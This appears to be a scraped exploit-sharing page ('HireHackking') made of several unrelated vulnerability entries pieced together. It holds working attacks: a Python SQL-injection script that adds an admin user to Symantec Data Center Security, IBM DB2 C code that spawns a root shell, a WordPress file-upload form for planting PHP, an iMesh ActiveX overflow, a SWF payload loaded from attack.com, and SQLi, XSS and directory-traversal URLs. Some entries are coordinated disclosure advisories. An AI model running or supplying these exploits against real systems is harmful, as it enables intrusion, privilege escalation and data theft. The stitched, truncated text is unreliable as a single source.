border="0" cellspacing="1" cellpadding="0"> <tr> <td height="50"><div valign="middle" align="center"><h1><font color="<? echo $campo['color_texto_titulo'];?>"><? echo $campo['titulo'];?></font></h1></div></td> </tr> <tr> <? if ($id_pagina==1){ $titular=$introduccion; }elseif($id_pagina==2){ $titular=$tareas; }elseif($id_pagina==3){ $titular=$proceso; }elseif($id_pagina==4){ $titular=$evaluacion; }else{ $titular=$conclusiones; } ?> <td height="50" bgcolor="<? echo $campo['color_cuadro_pagina'];?>"><font color="<? echo $campo['color_texto_tipo'];?>"><div valign="middle" align="center"><h3><? echo $titular;?></h3></div></font></td> </tr> <tr> <td><table width="100%" border="0" cellspacing="1" cellpadding="0"> <tr> <td width="81%" valign="top"><table width="100%" height="141" border="0" cellpadding="0" cellspacing="1"> <tr> <td width="1%" height="139"> </td> <td width="97%" valign="middle"><div align="left"> <table width="100%" height="134" border="0" cellpadding="0" cellspacing="1"> <tr> <td width="1%" valign="top"><div align="left"><img src="<? echo $imagen_actual;?>"></div></td> <td width="2%"> </td> <td width="97%"><? echo $texto_actual;?><br> <table align=center width="80%" border=0 bgcolor="<? echo $campo['color_cuadro_menu'];?>"> <? if ($id_pagina==3){ echo '<tr></tr>'; $sentencia="select url, descripcion from url where id_actividad=".$id_actividad; $resultado=mysql_query($sentencia); $j=1; while($v=mysql_fetch_array($resultado)){ foreach ($v as $indice=>$valor){ if(!is_int($indice)){ if($indice=='url'){ echo '<tr><td><div class="celdamenu"><a href='.$valor.' target="_blank"></div>'; }else{ echo $valor."</td></tr>"; } $url[$j][$indice]=$valor; } } $j++; } } mysql_close($c); ?> </table> </td> </tr> </table> </div></td> <td width="2%"> </td> </tr> </table></td> <td width="15%" valign="top"> <table width="100%" border="0" cellspacing="1" cellpadding="0" bgcolor="<? echo $campo['color_cuadro_texto'];?>" bordercolor="#FFFFFF"><tr><td> </td></tr></table> <table width="100%" border="0" cellspacing="1" cellpadding="0" bgcolor="<? echo $campo['color_cuadro_menu'];?>" bordercolor="#FFFFFF"> <tr> <td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=1"; ?>"> <? echo $enlace_introduccion; ?></a></div></td> </tr> <tr> <td height="1" bgcolor="#FFFFFF"></td> </tr> <tr> <td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=2"; ?>"> <? echo $enlace_tareas; ?></a></div></td> </tr> <tr> <td height="1" bgcolor="#FFFFFF"></td> </tr> <tr> <td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=3"; ?>"> <? echo $enlace_proceso; ?></a></font></div></td> </tr> <tr> <td height="1" bgcolor="#FFFFFF"></td> </tr> <tr> <td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=4"; ?>"> <? echo $enlace_evaluacion; ?></a></font></div></td> </tr> <tr> <td height="1" bgcolor="#FFFFFF"></td> </tr> <tr> <td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=5"; ?>"> <? echo $enlace_conclusiones; ?></a></font></div></td> </tr> </table></td> </tr> </table></td> </tr> </table></td> </tr> <tr> <td height="19"> <table width="100%" border="0" cellspacing="1" cellpadding="0"> <tr> <td width="55%"><div class="phpwebquest" align="right"><? echo $elaborada; ?> <? echo $campo['autor'];?> <? echo $con; ?></div></td> <td width="45%"><div class="phpwebquest" align="left"><a href="http://www.phpwebquest.org"> PHPWebquest</a></div></td> </tr> </table> </td> </tr> </table> </div></td> </tr> </table> </div> </body> </html> #greetz to all my friends ,balawi,ro3ob hr ,mothana-X , sharingan jo , and anonymous jo , and all muslim hackers
HireHackking

jclassifiedsmanager - Multiple Vulnerabilities

HACKER · %s · %s

# Exploit Title: jclassifiedsmanager Multiple Vulnerabilities # Google Dork: inurl:com_jclassifiedsmanager # Date: 26 Jan 2015 # Exploit Author: Sarath Nair aka AceNeon13 # Contact: @AceNeon13 # Greetings: HariKrishnan, Raj3sh.tv, Deepu.tv # Vendor Homepage: cmsjunkie.com # Software Link: http://www.cmsjunkie.com/classifieds-manager # PoC Exploit: SQL Injection -------------------------------- http://localhost/jclassifiedsmanager/classifieds/offerring-ads?controller=displayads&view=displayads&task=viewad&id=[SQL Injection Here] "id" parameter is not sanitized. # PoC Exploit: XSS Reflected -------------------------------- http://localhost/jclassifiedsmanager/classifieds?view=displayads7ed3b"onload%3d"alert(1)"87d4d&layout=offerring&controller=displayads&adtype=1 "view" parameter is not sanitized. ######################################## # Vulnerability Disclosure Timeline: 2014-Dec-11: Discovered vulnerability 2014-Dec-12: Vendor Notification 2014-Dec-12: Vendor Response/Feedback 2015-Jan-19: Vendor Fix/Patch 2015-Jan-26: Public Disclosure #######################################
HireHackking

Symantec Data Center Security - Multiple Vulnerabilities

HACKER · %s · %s

SEC Consult Vulnerability Lab Security Advisory < 20150122-0 > ======================================================================= title: Multiple critical vulnerabilities products: Symantec Data Center Security: Server Advanced (SDCS:SA) Symantec Critical System Protection (SCSP) vulnerable version: see: Vulnerable / tested versions fixed version: SCSP 5.2.9 MP6, SDCS:SA 6.0 MP1 - not all vulnerabilities were fixed, but mitigations exist impact: Critical CVE number: CVE-2014-7289, CVE-2014-9224, CVE-2014-9225, CVE-2014-9226 homepage: http://www.symantec.com found: 2014-09-19 by: Stefan Viehböck SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Symantec Data Center Security: Server Advanced v6.0 (DCS: Server Advanced) extends the Data Center Security: Server solution beyond agentless threat protections by incorporating technologies previous known as Critical System Protection. Data Center Security: Server Advanced provides granular, policy- based controls with a low impact in-guest agent to monitor and protect numerous physical and virtual server environments. Through a combination of technologies including application-centric controls including protected white listing, sandboxing using least privilege access controls, host-based intrusion detection (HIDS) and prevention (HIPS), and real-time file integrity monitoring (FIM), organizations can proactively safeguard their heterogeneous server environments and the information they contain from zero-day and targeted attacks, and fulfill their compliance mandates across critical systems. Click here for more info" Source: http://www.symantec.com/connect/forums/announcing-data-center-security-server-server-advanced-products Business recommendation: ------------------------ Attackers are able to completely compromise the SDCS:SA Server as they can gain access at the system and database level. Furthermore attackers can manage all clients and their policies. SDCS:SA Server can be used as an entry point into the target infrastructure (lateral movement, privilege escalation). Furthermore the SDCS:SA Client protections can be bypassed in several ways. It is highly recommended by SEC Consult not to use this software until a thorough security review (SDCS:SA Server, SDCS:SA Client Policies) has been performed by security professionals and all identified issues have been resolved. Note: SDCS:SA was replaced by SCSP. In this document the name SDCS:SA is used. Vulnerability overview/description: ----------------------------------- 1) Unauthenticated SQL Injection (SDCS:SA Server) (CVE-2014-7289) Due to insufficient input validation, the application allows the injection of direct SQL commands. By exploiting the vulnerability, an attacker gains access (read/write) to all records stored in the database as arbitrary SQL statements can be executed. Furthermore the application design enables an attacker to gain code execution as SYSTEM (highest privilege Windows user) on the server by exploiting this vulnerability. No prior authentication is needed to exploit this vulnerability. Affected script: https://<host>:4443/sis-ui/authenticate 2) Reflected Cross-Site-Scripting (XSS) (SDCS:SA Server) (CVE-2014-9224) The applications suffers from a reflected cross-site scripting vulnerability, which allows an attacker to steal other users' sessions, to impersonate other users and to gain unauthorized access to the admin interface. Affected scripts: https://<host>:8081/webui/Khaki_docs/SSO-Error.jsp https://<host>:8081/webui/admin/WCUnsupportedClass.jsp 3) Information Disclosure (SDCS:SA Server) (CVE-2014-9225) A script discloses internal information about the application on the server without prior authentication. This information includes file paths on the webserver, version information (OS, Java) and is accessible without prior authentication. Affected script: https://<host>:8081/webui/admin/environment.jsp 4) Multiple Default Security Protection Policy Bypasses (SDCS:SA Client) (CVE-2014-9226) Several bypasses were discovered. These require Windows Administrator permissions. This requirement is usually met in SDCS:SA deployments. Note: SEC Consult did not check whether the mitigations provided by Symantec do in fact sufficiently mitigate these vulnerabilities! - Persistent code execution via Windows Services The default Symantec policy rules can be bypassed in order to get persistent arbitrary code execution. - Remote code execution via RPC The default Symantec policy rules can be bypassed in order to get persistent arbitrary code execution. In addition to that "psexec-style" remote code execution via SMB is possible as well. - Policy bypass: Extraction of Windows passwords/hashes The default Symantec policy rules do not prevent attackers from extracting the Windows passwords/password hashes from the System. - Privilege elevation via Windows Installer (msiexec.exe) The restrictions imposed by the default policies can be bypassed entirely by exploiting incorrect assumptions made in the policy regarding the Windows Installer (msiexec.exe). - Privilege elevation/code execution via Windows Management Instrumentation (.mof files) The restrictions imposed by default policies can be bypassed partially by exploiting incorrect assumptions made in the policy regarding the Windows Management Instrumentation. The policy does not take intended OS functionality to execute code into account. Proof of concept: ----------------- 1) Unauthenticated SQL Injection (SDCS:SA Server) (CVE-2014-7289) The servlet accessible via /sis-ui/authenticate (TCP port 4443, HTTPS) is vulnerable to SQL injection. By sending a specially crafted HTTP request, arbitrary SQL statements can be executed. In a proof of concept exploit, SQL statements to add a new SDCS:SA user with admin privileges (username: secconsult, password: PASSWORD123!) were executed. These statements are: INSERT INTO USR (RID, USERNAME, PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL, ADDRESS, MANAGER_NAME, BUSINESS_INFO, PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT) VALUES (1504, 'secconsult', 'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=', '', '', '', '', '', '', '', '', NULL, 'SECCONSULT', '2014-09-12 07:13:09', '2014-09-12 07:13:23', '1', '0', '0', 'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto='); INSERT INTO ROLEMAP (USERRID, ROLERID) VALUES (1504, 1); The code used to exploit the SQL injection vulnerability is listed below: import httplib def send_request(host,data): params = data headers = {"AppFire-Format-Version": "1.0", "AppFire-Charset": "UTF-16LE", "Content-Type":"application/x-appfire", "User-Agent":"Java/1.7.0_45", } conn = httplib.HTTPSConnection(host) conn.request("POST", "/sis-ui/authenticate", params, headers) response = conn.getresponse() data=response.read() conn.close() return response,data header ="Data-Format=text/plain\nData-Type=properties\nData-Length=%i\n\n" data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO USR (RID, USERNAME, PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL, ADDRESS, MANAGER_NAME, BUSINESS_INFO, PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT) VALUES (1504, 'secconsult', 'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=', '', '', '', '', '', '', '', '', NULL, 'SV DESCRIPTION', '2014-09-12 07:13:09', '2014-09-12 07:13:23', '1', '0', '0', 'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto='); -- '' " # add user to USR table #data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO ROLEMAP (USERRID, ROLERID) VALUES (1504, 1); -- " # add user to admin group data+="\r\nan=Symantec Data Center Security Server 6.0\r\npwd=GBgYGBgYGBgYGBgYGBgYGBg=\r\nav=6.0.0.380\r\nhn=WIN-3EJQK7U0S3R\r\nsso=\r\n" data = data.encode('utf-16le') eof_flag="\nEOF_FLAG\n" header = header %(len(data)) payload=header+data+eof_flag response,data = send_request("<host>:4443",payload) print data.decode('utf-16le') print response.status As the application users act as Tomcat administrators, an attacker can login into the Tomcat manager as well. The Tomcat manager is available by default via TCP port 8081 HTTPS. The Tomcat Web Application Manager can be used to deploy new .war-files containing attacker-controlled Java code. This allows an attacker to execute arbitrary commands on the operating system with the permissions/user of the "Symantec Data Center Security Server Manager" service (SISManager) which are SYSTEM. 2) Reflected Cross-Site-Scripting (XSS) (SDCS:SA Server) (CVE-2014-9224) At least the following URLs are vulnerable to XSS: https://example.com:8081/webui/Khaki_docs/SSO-Error.jsp?ErrorMsg=<script>alert('xss')</script> https://example.com:8081/webui/admin/WCUnsupportedClass.jsp?classname=<script>alert('xss')</script> 3) Information Disclosure (SDCS:SA Server) (CVE-2014-9225) The following URLs discloses internal information: https://example.com:8081/webui/admin/environment.jsp 4) Multiple Default Security Protection Policy Bypasses (SDCS:SA Client) (CVE-2014-9226) - Persistent code execution via Windows Services Windows Service binaries can have file extensions other than ".exe". This allows an attacker to execute arbitrary files and enables automatic execution of malicious code at OS boot. - Remote code execution via RPC Existing tools like "psexec" or Metasploit (/exploit/windows/smb/psexec) can be modified to write files not ending with ".exe" on the target system. - Policy bypass: Extraction of Windows passwords/hashes The tool "mimikatz" can be used to extract Windows credentials. - Privilege elevation via Windows Installer (msiexec.exe) msiexec.exe is trusted "safe privileges" when started as a service (usually "Windows Installer" parameter "/V"). This can be abused by creating a service that starts msiexec.exe with the parameters "/quiet", "/i" and a path to a valid .msi file. Upon service start the .msi file is executed with "safe privileges" privileges and not subject to any SDCS:SA Client checks. sc create evil_service binpath= "c:\windows\System32\msiexec.exe /quiet /i c:\temp\evil_msi" type= own start= auto error= ignore net start evil_service - Privilege elevation/code execution via Windows Management Instrumentation (.mof files) On old Windows versions .mof files placed in "%SystemRoot%\System32\wbem\mof\" are automatically compiled/executed. These trigger arbitrary code execution. The code is executed with "def_winsvcs_ps" permissions. Vulnerable / tested versions: ----------------------------- The vulnerabilities have been verified to exist in Symantec Data Center Security: Server Advanced version 6.0, which was the most recent version at the time of discovery. However other versions (SCSP 5.2.9) are affected by the vulnerabilities as well. See the vendor information in the Solution section. Vendor contact timeline: ------------------------ 2014-10-20: Sending advisory and proof of concept exploit via encrypted channel. 2014-10-20: Vendor acknowledges receipt of advisory. 2014-11-18: Requesting status update. 2014-11-18: Vendor responds and informs about an advisory in December, version containing fixes in February. 2014-12-04: Vendor informs about delays in releasing fixes/mitigations, target release date mid-January. 2015-01-08: Vendor confirms release date for fixes/mitigations (2015-01-17). 2015-01-17: Vendor releases fixes for SCSP. 2015-01-19: Vendor releases advisory and mitigations for SCSP/ 2015-01-22: SEC Consult releases coordinated security advisory. Solution: --------- Update to the most recent version of SCSP (5.2.9 MP6) or SDCS:SA (6.0 MP1). Not all vulnerabilities are fixed by this update! However, Symantec has provided mitigations for these issues: More information can be found at: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20150119_00 http://www.symantec.com/business/support/index?page=content&id=TECH227679 http://www.symantec.com/business/support/index?page=content&id=HOWTO100996&actp=search&viewlocale=en_US&searchid=1421349750071 Workaround: ----------- See solution. Advisory URL: ------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich Headquarter: Mooslackengasse 17, 1190 Vienna, Austria Phone: +43 1 8903043 0 Fax: +43 1 8903043 15 Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult Interested to work with the experts of SEC Consult? Write to career@sec-consult.com EOF Stefan Viehböck / @2015
HireHackking
# Exploit Title: Photo Gallery 1.2.5 Unrestricted File Upload # Date: 11-11-2014 # Software Link: https://wordpress.org/plugins/photo-gallery/ # Exploit Author: Kacper Szurek # Contact: http://twitter.com/KacperSzurek # Website: http://security.szurek.pl/ # CVE: CVE-2014-9312 # Category: webapps 1. Description Every registered user (even Subscriber) can access upload functionality because of read role used inside UploadHandler.php http://security.szurek.pl/photo-gallery-125-unrestricted-file-upload.html 2. Proof of Concept Login as regular user (created using wp-login.php?action=register). Pack .php files into .zip archive then send it using: <form method="post" action="http://wordpress-install/wp-admin/admin-ajax.php?action=bwg_UploadHandler&dir=rce/" enctype="multipart/form-data"> <input type="file" name="files"> <input type="submit" value="Hack!"> </form> Your files will be visible inside: http://wordpress-install/wp-admin/rce/ 3. Solution: Update to version 1.2.6 https://downloads.wordpress.org/plugin/photo-gallery.1.2.6.zip
HireHackking
// source: https://www.securityfocus.com/bid/48514/info IBM DB2 is prone to a vulnerability that lets attackers execute arbitrary code. An attacker can exploit this issue to gain elevated privileges and execute arbitrary code with root privileges. Successfully exploiting this issue will result in a complete compromise of the affected system. IBM DB2 9.7 is vulnerable; other versions may also be affected. /* Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the Nth Dimension nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. (c) Tim Brown, 2011 <mailto:timb@nth-dimension.org.uk> <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/> PoC exploit for IBM DB2 DT_RPATH privesc. */ #include <stdlib.h> #include <unistd.h> #include <stdio.h> int main(int argc, char **argv) { FILE *badlibkbbsrchandle; int pwnedflag; printf("PoC exploit for IBM DB2 DT_RPATH privesc.\r\n"); printf("(c) Tim Brown, 2011\r\n"); printf("<mailto:timb@nth-dimension.org.uk>\r\n"); printf("<http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>\r\n"); printf("Constructing bad_libkbb.so...\r\n"); badlibkbbsrchandle = fopen("bad_libkbb.c", "w"); fprintf(badlibkbbsrchandle, "#include <stdio.h>\r\n"); fprintf(badlibkbbsrchandle, "#include <unistd.h>\r\n"); fprintf(badlibkbbsrchandle, "#include <stdlib.h>\r\n"); fprintf(badlibkbbsrchandle, "\r\n"); fprintf(badlibkbbsrchandle, "void __attribute__ ((constructor)) bad_libkbb(void) {\r\n"); fprintf(badlibkbbsrchandle, " printf(\"Have a root shell...\\r\\n\");\r\n"); fprintf(badlibkbbsrchandle, " setuid(geteuid());\r\n"); fprintf(badlibkbbsrchandle, " system(\"/usr/bin/id\");\r\n"); fprintf(badlibkbbsrchandle, " system(\"/bin/sh\");\r\n"); fprintf(badlibkbbsrchandle, " exit(0);\r\n"); fprintf(badlibkbbsrchandle, "}\r\n"); fclose(badlibkbbsrchandle); system("gcc -shared -fPIC -o libkbb.so bad_libkbb.c"); system("/opt/ibm/db2/V9.7/itma/tmaitm6/lx8266/bin/kbbacf1"); exit(0); }
HireHackking

iMesh 10.0 - 'IMWebControl.dll' ActiveX Control Buffer Overflow

HACKER · %s · %s

source: https://www.securityfocus.com/bid/48550/info iMesh is prone to a buffer overflow vulnerability because the application fails to perform adequate boundary-checks on user-supplied data. Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using an affected ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions. iMesh 10.0 is vulnerable; other versions may also be affected. <!-- ### # Title : iMesh <= 10.0 (IMWebControl.dll) Remote Buffer Overflow Exploit # Author : KedAns-Dz # E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com # Home : HMD/AM (30008/04300) - Algeria -(00213555248701) # Web Site : www.1337day.com * www.exploit-id.com * www.dis9.com # Twitter page : twitter.com/kedans # platform : windows # Impact : Remote Buffer Overflow & DLL Hijacked ## # <3 Liyan Oz + All UE-Team & I.BackTrack Team <3 ### --> <?XML version=&#039;1.0&#039; standalone=&#039;yes&#039; ?> <package> <job id=&#039;DoneInVBS&#039; debug=&#039;false&#039; error=&#039;true&#039;> <object classid=&#039;clsid:7C3B01BC-53A5-48A0-A43B-0C67731134B97&#039; id=&#039;target&#039;/> <script language=&#039;vbscript&#039;> &#039;Wscript.echo typename(target) targetFile = "C:\Program Files\iMesh Applications\iMesh\IMWebControl.dll" prototype = "ProcessRequestEx ( ByVal sourceName As String , ByVal destName As String , ByVal bFailIfExists As Long )" memberName = "ProcessRequestEx" progid = "target.IMWebControl" buf=String(31337, "A") &#039; Buffer Overflow puf=218959117 &#039;set ecx to 0x0d0d0d0d target.SetHandler puf target.ProcessRequestEx buf ,puf &#039; Bo0M ! </script> </job> </package> <!-- #================[ Exploited By KedAns-Dz * Inj3ct0r * ]========================================= # Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > ++ Liyan Oz & Blackrootkit ..all # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu # gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r &#039;www.1337day.com/team&#039; ++ .... * Str0ke # Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * TreX (hotturks.org) # Jago-Dz (sec4ever.com) * Kalashinkov3 * PaCketStorm Team (www.packetstormsecurity.org) # www.metasploit.com * Underground Exploitation (www.dis9.com) * All Security and Exploits Webs ... # -+-+-+-+-+-+-+-+-+-+-+-+={ Greetings to Friendly Teams : }=+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- # (D) HaCkerS-StreeT-Team (Z) | Inj3ct0r | Exploit-ID | UE-Team | PaCket.Storm.Sec TM | Sec4Ever # h4x0re-Sec | Dz-Ghost | INDONESIAN CODER | HotTurks | IndiShell | D.N.A | DZ Team | Milw0rm # Indian Cyber Army | MetaSploit | BaCk-TraCk | AutoSec.Tools | HighTech.Bridge SA | Team DoS-Dz #================================================================================================ -->
HireHackking

Paliz Portal - Cross-Site Scripting / Multiple SQL Injections

HACKER · %s · %s

source: https://www.securityfocus.com/bid/48559/info Paliz Portal is prone to multiple SQL-injection vulnerabilities and a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/Page.aspx?search=1[XSSCode]&mID=1641&Page=search/advancedsearch http://www.example.com/News/shownews/[page].aspx?NewsId=[Sqli] http://www.example.com/[Path]/Default.aspx?tabid=[Sqli]
HireHackking

eTAWASOL - 'id' SQL Injection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/48561/info eTAWASOL is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/npages/back.asp?id=[SQL]
HireHackking

VideoLAN VLC Media Player 2.1.5 - DEP Access Violation

HACKER · %s · %s

Title : VLC Player 2.1.5 DEP Access Violation Vulnerability Discoverer: Veysel HATAS (@muh4f1z) Web page : www.binarysniper.net Vendor : VideoLAN VLC Project Test: Windows XP SP3 Status: Fixed Severity : High CVE ID : CVE-2014-9597 <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-9597> NIST: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9597 OSVDB ID : 116450 <http://osvdb.org/show/osvdb/116450> VLC Ticket : 13389 <https://trac.videolan.org/vlc/ticket/13389> windbglog : windbglog.txt <https://trac.videolan.org/vlc/attachment/ticket/13389/windbglog.txt> Discovered : 24 November 2014 Reported : 26 December 2014 Published : 9 January 2015 Description : VLC Media Player contains a flaw that is triggered as user-supplied input is not properly sanitized when handling a specially crafted FLV file <http://www.datafilehost.com/d/9565165f>. This may allow a context-dependent attacker to corrupt memory and potentially execute arbitrary code. # Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35901-poc.flv # Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35901-windbglog.txt
HireHackking
================================================================================ [REWTERZ-20140103] - Rewterz - Security Advisory ================================================================================ Title: ManageEngine ServiceDesk Plus User Privileges Management Vulnerability Product: ServiceDesk Plus (http://www.manageengine.com/) Affected Version: 9.0 (Other versions could also be affected) Fixed Version: 9.0 Build 9031 Vulnerability Impact: Low Advisory ID: REWTERZ-20140103 Published Date: 22-Jan-2015 Researcher: Muhammad Ahmed Siddiqui Email: ahmed [at] rewterz.com URL: http://www.rewterz.com/vulnerabilities/manageengine-servicedesk-plus-user-privileges-management-vulnerability ================================================================================ Product Introduction =============== ServiceDesk Plus is a help desk software with integrated asset and project management built on the ITIL framework. It is available in 29 different languages and is used by more than 85,000 companies, across 186 countries, to manage their IT help desk and assets. Source: http://www.manageengine.com/products/service-desk/ Vulnerability Information =================== Class: Improper Privilege Management Impact: Low privileged user can access application data Remotely Exploitable: Yes Authentication Required: Yes User interaction required: Yes CVE Name: N/A Vulnerability Description ================== A user with limited privileges could gain access to certain functionality that is available only to administrative users. For example, users with Guest privileges can see the subjects of the tickets, stats and other information related to tickets. Proof-of-Concept ============= http://127.0.0.1:8080/servlet/AJaxServlet?action=getTicketData&search=dateCrit http://127.0.0.1:8080/swf/flashreport.swf http://127.0.0.1:8080/reports/flash/details.jsp?group=Site http://127.0.0.1:8080/reports/CreateReportTable.jsp?site=0 Timeline ====== 23-Dec-2014 – Notification to Vendor 24-Dec-2014 – Response from Vendor 30-Dec-2014 – Vulnerability fixed by Vendor About Rewterz =========== Rewterz is a boutique Information Security company, committed to consistently providing world class professional security services. Our strategy revolves around the need to provide round-the-clock quality information security services and solutions to our customers. We maintain this standard through our highly skilled and professional team, and custom-designed, customer-centric services and products. http://www.rewterz.com Complete list of vulnerability advisories published by Rewterz: http://www.rewterz.com/resources/security-advisories
HireHackking

SWFupload 2.5.0 - Cross Frame Scripting (XFS)

HACKER · %s · %s

# Exploit Title: SWFupload All Version XSF Vulnerability # Date: 25/01/2014 # Exploit Author: MindCracker - Team MaDLeeTs # Contact : MindCrackerKhan@Gmail.com - Maddy@live.com.pk | https://twitter.com/MindCrackerKhan # Verion : All # Tested on: Linux / Window #Description : XSF occurs when an SWF have permission/able to load another file from another directory or site.The vulnerable swf can be exploited by just loading swf/img/any ( like Phishing or Cross-Site scripting #Vulnerable Code : ExternalInterface.addCallback("SetButtonTextStyle",this.SetButtonTextStyle); this.SetButtonTextStyle(String(root.loaderInfo.parameters.buttonTextStyle)); } catch(ex:Object) { this.SetButtonTextStyle(""); } try { As you can see the .buttonTextStyle variable is not well configured ( by exactly adding the value ) and This ButtonTextStyle will accept any value The vulneralbe SWF will load any file http://victim.com/buttontextstyle.swf?buttonTextStyle=http://attack.com/Exploiting.swf 2. ExternalInterface.addCallback("SetButtonText",this.SetButtonText); SetButtonText { this.SetButtonText(String(root.loaderInfo.parameters.buttonText)); } catch(ex:Object) { this.SetButtonText(""); } try { #POC http://victim.com/swfupload.swf?buttonTextStyle=http://attack.com/Exploiting.swf
HireHackking
################################################################################################ # # # ...:::::ManageEngine EventLog Analyzer Directory Traversal/XSS Vulnerabilities::::.... # # ############################################################################################# Sobhan System Network & Security Group (sobhansys) ------------------------------------------------------- # Date: 2015-01-24 # Exploit Author: AmirHadi Yazdani (Sobhansys Co) # Vendor Homepage: http://www.manageengine.com/products/eventlog/ # Demo Link: http://demo.eventloganalyzer.com/event/index3.do #Affected version: <= Build Version : 9.0 About ManageEngine EventLog Analyzer (From Vendor Site) : EventLog Analyzer provides the most cost-effective Security Information and Event Management (SIEM) software on the market. Using this Log Analyzer software, organizations can automate the entire process of managing terabytes of machine generated logs by collecting, analyzing, correlating, searching, reporting, and archiving from one central location. This event log analyzer software helps to monitor file integrity, conduct log forensics analysis, monitor privileged users and comply to different compliance regulatory bodies by intelligently analyzing your logs and instantly generating a variety of reports like user activity reports, historical trend reports, and more. -------------------------------------------------------- I'M hadihadi From Virangar Security Team special tnx to:MR.nosrati,black.shadowes,MR.hesy & all virangar members & all hackerz greetz to My friends In Signal IT Group (www.signal-net.net) & A.Molaei spl:Z.Khodaee ------- exploit: Diretory Traversal : http://127.0.0.1/event/index2.do?helpP=userReport&overview=true&tab=report&url=../../WEB-INF/web.xml%3f http://127.0.0.1/event/index2.do?completeData=true&helpP=archiveAction&tab=system&url=../../WEB-INF/web.xml%3f http://127.0.0.1/event/index2.do?helpP=fim&link=0&sel=13&tab=system&url=../../WEB-INF/web.xml%3f XSS : 